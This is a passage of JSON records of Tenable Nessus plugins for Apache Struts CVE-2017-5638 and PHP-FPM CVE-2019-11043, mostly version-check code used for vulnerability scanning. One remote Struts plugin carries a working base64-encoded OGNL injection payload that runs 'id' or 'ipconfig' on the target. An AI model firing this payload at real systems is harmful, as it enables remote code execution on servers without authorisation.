script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\napp_info = vcf::combined_get_app_info(app:\"Apache Struts\");\n\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nconstraints = [\n { \"min_version\" : \"2.3.5\", \"max_version\" : \"2.3.31\", \"fixed_version\" : \"2.3.32\" },\n { \"min_version\" : \"2.5\", \"max_version\" : \"2.5.10\", \"fixed_version\" : \"2.5.10.1\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:10:51", "description": "The remote web server is being targeted by an Apache Struts 2 exploitation attempt. Versions of Apache Struts 2.5.x prior to 2.5.10.1 and 2.3.x prior to 2.3.32 are affected by a flaw that is triggered when handling invalid Content-Type, Content-Disposition, or Content-Length values for uploaded files using the Jakarta Multipart parser. This may allow a remote attacker to potentially execute arbitrary code.", "cvss3": {}, "published": "2017-04-12T00:00:00", "type": "nessus", "title": "Apache Struts 2 RCE (CVE-2017-5638) (deprecated)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "700055.PRM", "href": "https://www.tenable.com/plugins/nnm/700055", "sourceData": "Binary data 700055.prm", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:10:10", "description": "The version of Apache Struts running on the remote host is affected by a remote code execution vulnerability in the Jakarta Multipart parser due to improper handling of the Content-Type header. An unauthenticated, remote attacker can exploit this, via a specially crafted Content-Type header value in the HTTP request, to potentially execute arbitrary code, subject to the privileges of the web server user.", "cvss3": {}, "published": "2017-03-08T00:00:00", "type": "nessus", "title": "Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (remote)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_5_10_1_RCE.NASL", "href": "https://www.tenable.com/plugins/nessus/97610", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97610);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2017-5638\");\n script_bugtraq_id(96729);\n script_xref(name:\"CERT\", value:\"834067\");\n script_xref(name:\"EDB-ID\", value:\"41570\");\n script_xref(name:\"EDB-ID\", value:\"41614\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (remote)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that uses a Java\nframework that is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is affected by\na remote code execution vulnerability in the Jakarta Multipart parser\ndue to improper handling of the Content-Type header. An\nunauthenticated, remote attacker can exploit this, via a specially\ncrafted Content-Type header value in the HTTP request, to potentially\nexecute arbitrary code, subject to the privileges of the web server\nuser.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html\");\n # https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?77e9c654\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-045\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.32 / 2.5.10.1 or later.\nAlternatively, apply the workaround referenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5638\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts Jakarta Multipart Parser OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\");\n script_require_ports(\"Services/www\", 80, 8080);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\n\nport = get_http_port(default:8080);\ncgis = get_kb_list('www/' + port + '/cgi');\n\nurls = make_list('/');\n\n# To identify actions that we can test the exploit on we will look\n# for files with the .action / .jsp / .do suffix from the KB.\nif (!isnull(cgis))\n{\n foreach cgi (cgis)\n {\n match = pregmatch(pattern:\"((^.*)(/.+\\.act(ion)?)($|\\?|;))\", string:cgi);\n if (match)\n {\n urls = make_list(urls, match[0]);\n if (!thorough_tests) break;\n }\n match2 = pregmatch(pattern:\"(^.*)(/.+\\.jsp)$\", string:cgi);\n if (!isnull(match2))\n {\n urls = make_list(urls, match2[0]);\n if (!thorough_tests) break;\n }\n match3 = pregmatch(pattern:\"(^.*)(/.+\\.do)$\", string:cgi);\n if (!isnull(match3))\n {\n urls = make_list(urls, match3[0]);\n if (!thorough_tests) break;\n }\n if (cgi =~ \"struts2?(-rest)?-showcase\")\n {\n urls = make_list(urls, cgi);\n if (!thorough_tests) break;\n }\n }\n}\nif (thorough_tests)\n{\n cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');\n if (!isnull(cgi2)) urls = make_list(urls, cgi2);\n\n cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');\n if (!isnull(cgi3)) urls = make_list(urls, cgi3);\n\n cgi4 = get_kb_list('www/' + port + '/content/extensions/do');\n if (!isnull(cgi4)) urls = make_list(urls, cgi4);\n}\n\nurls = list_uniq(urls);\n\nvuln = FALSE;\n\nrand_var = rand_str(length:8);\nheader_payload = \"%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Tenable','\" + rand_var + \"')}.multipart/form-data\";\nheaders_1 = make_array(\"Content-Type\", header_payload);\n\n# The OGNL exploit has been base64 encoded to evade AV quarantine for certain AV\n# vendors.\n# {'cmd.exe','/c','ipconfig','/all'}:{'bash','-c','id'}))\nexploit = \"JXsoI189J211bHRpcGFydC9mb3JtLWRhdGEnKS4oI2RtPUBvZ25sLk9nbmxDb250ZX\";\nexploit += \"h0QERFRkFVTFRfTUVNQkVSX0FDQ0VTUykuKCNfbWVtYmVyQWNjZXNzPygjX21lbWJ\";\nexploit += \"lckFjY2Vzcz0jZG0pOigoI2NvbnRhaW5lcj0jY29udGV4dFsnY29tLm9wZW5zeW1w\";\nexploit += \"aG9ueS54d29yazIuQWN0aW9uQ29udGV4dC5jb250YWluZXInXSkuKCNvZ25sVXRpb\";\nexploit += \"D0jY29udGFpbmVyLmdldEluc3RhbmNlKEBjb20ub3BlbnN5bXBob255Lnh3b3JrMi\";\nexploit += \"5vZ25sLk9nbmxVdGlsQGNsYXNzKSkuKCNvZ25sVXRpbC5nZXRFeGNsdWRlZFBhY2t\";\nexploit += \"hZ2VOYW1lcygpLmNsZWFyKCkpLigjb2dubFV0aWwuZ2V0RXhjbHVkZWRDbGFzc2Vz\";\nexploit += \"KCkuY2xlYXIoKSkuKCNjb250ZXh0LnNldE1lbWJlckFjY2VzcygjZG0pKSkpLigja\";\nexploit += \"XN3aW49KEBqYXZhLmxhbmcuU3lzdGVtQGdldFByb3BlcnR5KCdvcy5uYW1lJykudG\";\nexploit += \"9Mb3dlckNhc2UoKS5jb250YWlucygnd2luJykpKS4oI2NtZHM9KCNpc3dpbj97J2N\";\nexploit += \"tZC5leGUnLCcvYycsJ2lwY29uZmlnJywnL2FsbCd9OnsnYmFzaCcsJy1jJywnaWQn\";\nexploit += \"fSkpLigjcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKCNjbWRzKSkuKCNwL\";\nexploit += \"nJlZGlyZWN0RXJyb3JTdHJlYW0odHJ1ZSkpLigjcHJvY2Vzcz0jcC5zdGFydCgpKS\";\nexploit += \"4oI3Jvcz0oQG9yZy5hcGFjaGUuc3RydXRzMi5TZXJ2bGV0QWN0aW9uQ29udGV4dEB\";\nexploit += \"nZXRSZXNwb25zZSgpLmdldE91dHB1dFN0cmVhbSgpKSkuKEBvcmcuYXBhY2hlLmNv\";\nexploit += \"bW1vbnMuaW8uSU9VdGlsc0Bjb3B5KCNwcm9jZXNzLmdldElucHV0U3RyZWFtKCksI\";\nexploit += \"3JvcykpLigjcm9zLmZsdXNoKCkpfQo=\";\n\nheaders_2 = make_array(\"Content-Type\", chomp(base64_decode(str:exploit)));\n\n# Since struts apps could be taking longer\ntimeout = get_read_timeout() * 2;\nif(timeout < 10)\n timeout = 10;\nhttp_set_read_timeout(timeout);\n\nforeach url (urls)\n{\n ############################################\n # Method 1\n ############################################\n res = http_send_recv3(\n method : \"GET\",\n item : url,\n port : port,\n add_headers : headers_1,\n exit_on_fail : TRUE\n );\n if ( (\"X-Tenable: \"+ rand_var ) >< res[1] )\n vuln = TRUE;\n # Stop after first vulnerable Struts app is found\n if (vuln) break;\n\n ############################################\n # Method 2\n ############################################\n\n cmd_pats = make_array();\n cmd_pats['id'] = \"uid=[0-9]+.*\\sgid=[0-9]+.*\";\n cmd_pats['ipconfig'] = \"Subnet Mask|Windows IP|IP(v(4|6)?)? Address\";\n\n res = http_send_recv3(\n method : \"GET\",\n item : url,\n port : port,\n add_headers : headers_2,\n exit_on_fail : TRUE\n );\n\n if (\"Windows IP\" >< res[2] || \"uid\" >< res[2])\n {\n if (pgrep(pattern:cmd_pats['id'], string:res[2]))\n {\n output = strstr(res[2], \"uid\");\n if (!empty_or_null(output))\n {\n vuln = TRUE;\n vuln_url = build_url(qs:url, port:port);\n break;\n }\n }\n else if (pgrep(pattern:cmd_pats['ipconfig'], string:res[2]))\n {\n output = strstr(res[2], \"Windows IP\");\n if (!empty_or_null(output))\n {\n vuln = TRUE;\n vuln_url = build_url(qs:url, port:port);\n break;\n }\n }\n }\n}\n\n\nif (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n request : make_list(http_last_sent_request()),\n output : chomp(output)\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-02T15:36:20", "description": "The instance of Selligent Message Studio running on the remote host is affected by CVE-2017-5638, a code execution vulnerability in Apache Struts (S2-045). A remote, unauthenticated attacker can exploit this issue, via a specially crafted HTTP request, to execute code on the remote host.", "cvss3": {}, "published": "2020-10-20T00:00:00", "type": "nessus", "title": "Selligent Message Studio Struts Code Execution (CVE-2017-5638)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2023-05-31T00:00:00", "cpe": ["x-cpe:/a:selligent:selligent_message_studio"], "id": "SELLIGENT_MESSAGE_STUDIO_RCE.NBIN", "href": "https://www.tenable.com/plugins/nessus/141576", "sourceData": "Binary data selligent_message_studio_rce.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:23:32", "description": "The remote CentOS Linux 8 host has packages installed that are affected by a vulnerability as referenced in the CESA-2019:3735 advisory.\n\n - php: underflow in env_path_info in fpm_main.c (CVE-2019-11043)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-01-29T00:00:00", "type": "nessus", "title": "CentOS 8 : php:7.2 (CESA-2019:3735)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11043"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/o:centos:centos:8", "p-cpe:/a:centos:centos:apcu-panel", "p-cpe:/a:centos:centos:libzip", "p-cpe:/a:centos:centos:libzip-devel", "p-cpe:/a:centos:centos:libzip-tools", "p-cpe:/a:centos:centos:php-pear", "p-cpe:/a:centos:centos:php-pecl-apcu", "p-cpe:/a:centos:centos:php-pecl-apcu-devel", "p-cpe:/a:centos:centos:php-pecl-zip"], "id": "CENTOS8_RHSA-2019-3735.NASL", "href": "https://www.tenable.com/plugins/nessus/145659", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The package checks in this plugin were extracted from\n# Red Hat Security Advisory RHSA-2019:3735. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(145659);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2019-11043\");\n script_xref(name:\"RHSA\", value:\"2019:3735\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0695\");\n\n script_name(english:\"CentOS 8 : php:7.2 (CESA-2019:3735)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote CentOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote CentOS Linux 8 host has packages installed that are affected by a vulnerability as referenced in the\nCESA-2019:3735 advisory.\n\n - php: underflow in env_path_info in fpm_main.c (CVE-2019-11043)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2019:3735\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-11043\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP-FPM Underflow RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/10/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:apcu-panel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libzip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libzip-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libzip-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-pecl-apcu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-pecl-apcu-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-pecl-zip\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CentOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/CentOS/release');\nif (isnull(os_release) || 'CentOS' >!< os_release) audit(AUDIT_OS_NOT, 'CentOS');\nvar os_ver = pregmatch(pattern: \"CentOS(?: Stream)?(?: Linux)? release ([0-9]+)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'CentOS');\nos_ver = os_ver[1];\nif ('CentOS Stream' >< os_release) audit(AUDIT_OS_NOT, 'CentOS 8.x', 'CentOS Stream ' + os_ver);\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '8')) audit(AUDIT_OS_NOT, 'CentOS 8.x', 'CentOS ' + os_ver);\n\nif (!get_kb_item('Host/CentOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'CentOS', cpu);\n\nvar module_ver = get_kb_item('Host/RedHat/appstream/php');\nif (isnull(module_ver)) audit(AUDIT_PACKAGE_NOT_INSTALLED, 'Module php:7.2');\nif ('7.2' >!< module_ver) audit(AUDIT_PACKAGE_NOT_AFFECTED, 'Module php:' + module_ver);\n\nvar appstreams = {\n 'php:7.2': [\n {'reference':'apcu-panel-5.1.12-2.module_el8.1.0+209+03b9a8ff', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'apcu-panel-5.1.12-2.module_el8.1.0+209+03b9a8ff', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libzip-1.5.1-2.module_el8.1.0+209+03b9a8ff', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libzip-1.5.1-2.module_el8.1.0+209+03b9a8ff', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libzip-devel-1.5.1-2.module_el8.1.0+209+03b9a8ff', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libzip-devel-1.5.1-2.module_el8.1.0+209+03b9a8ff', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libzip-tools-1.5.1-2.module_el8.1.0+209+03b9a8ff', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libzip-tools-1.5.1-2.module_el8.1.0+209+03b9a8ff', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'php-pear-1.10.5-9.module_el8.1.0+209+03b9a8ff', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'php-pear-1.10.5-9.module_el8.1.0+209+03b9a8ff', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'php-pecl-apcu-5.1.12-2.module_el8.1.0+209+03b9a8ff', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'php-pecl-apcu-5.1.12-2.module_el8.1.0+209+03b9a8ff', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'php-pecl-apcu-devel-5.1.12-2.module_el8.1.0+209+03b9a8ff', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'php-pecl-apcu-devel-5.1.12-2.module_el8.1.0+209+03b9a8ff', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'php-pecl-zip-1.15.3-1.module_el8.1.0+209+03b9a8ff', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'php-pecl-zip-1.15.3-1.module_el8.1.0+209+03b9a8ff', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n ]\n};\n\nvar flag = 0;\nappstreams_found = 0;\nforeach module (keys(appstreams)) {\n var appstream = NULL;\n var appstream_name = NULL;\n var appstream_version = NULL;\n var appstream_split = split(module, sep:':', keep:FALSE);\n if (!empty_or_null(appstream_split)) {\n appstream_name = appstream_split[0];\n appstream_version = appstream_split[1];\n if (!empty_or_null(appstream_name)) appstream = get_one_kb_item('Host/RedHat/appstream/' + appstream_name);\n }\n if (!empty_or_null(appstream) && appstream_version == appstream || appstream_name == 'all') {\n appstreams_found++;\n foreach package_array ( appstreams[module] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = 'CentOS-' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && _release) {\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n }\n }\n}\n\nif (!appstreams_found) audit(AUDIT_PACKAGE_NOT_INSTALLED, 'Module php:7.2');\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'apcu-panel / libzip / libzip-devel / libzip-tools / php-pear / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:57:36", "description": "The remote NewStart CGSL host, running version MAIN 4.05, has php packages installed that are affected by a vulnerability:\n\n - In PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below 7.3.11 in certain configurations of FPM setup it is possible to cause FPM module to write past allocated buffers into the space reserved for FCGI protocol data, thus opening the possibility of remote code execution. (CVE-2019-11043)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-03-08T00:00:00", "type": "nessus", "title": "NewStart CGSL MAIN 4.05 : php Vulnerability (NS-SA-2020-0018)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11043"], "modified": "2023-04-25T00:00:00", "cpe": [], "id": "NEWSTART_CGSL_NS-SA-2020-0018_PHP.NASL", "href": "https://www.tenable.com/plugins/nessus/134323", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were\n# extracted from ZTE advisory NS-SA-2020-0018. The text\n# itself is copyright (C) ZTE, Inc.\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134323);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2019-11043\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0695\");\n\n script_name(english:\"NewStart CGSL MAIN 4.05 : php Vulnerability (NS-SA-2020-0018)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote machine is affected by a vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote NewStart CGSL host, running version MAIN 4.05, has php packages installed that are affected by a\nvulnerability:\n\n - In PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24\n and 7.3.x below 7.3.11 in certain configurations of FPM\n setup it is possible to cause FPM module to write past\n allocated buffers into the space reserved for FCGI\n protocol data, thus opening the possibility of remote\n code execution. (CVE-2019-11043)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/notice/NS-SA-2020-0018\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the vulnerable CGSL php packages. Note that updated packages may not be available yet. Please contact ZTE for\nmore information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-11043\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP-FPM Underflow RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/10/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"NewStart CGSL Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/ZTE-CGSL/release\", \"Host/ZTE-CGSL/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/ZTE-CGSL/release\");\nif (isnull(release) || release !~ \"^CGSL (MAIN|CORE)\") audit(AUDIT_OS_NOT, \"NewStart Carrier Grade Server Linux\");\n\nif (release !~ \"CGSL MAIN 4.05\")\n audit(AUDIT_OS_NOT, 'NewStart CGSL MAIN 4.05');\n\nif (!get_kb_item(\"Host/ZTE-CGSL/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"NewStart Carrier Grade Server Linux\", cpu);\n\nflag = 0;\n\npkgs = {\n \"CGSL MAIN 4.05\": [\n \"php-5.3.3-50.el6_10\",\n \"php-bcmath-5.3.3-50.el6_10\",\n \"php-cli-5.3.3-50.el6_10\",\n \"php-common-5.3.3-50.el6_10\",\n \"php-dba-5.3.3-50.el6_10\",\n \"php-debuginfo-5.3.3-50.el6_10\",\n 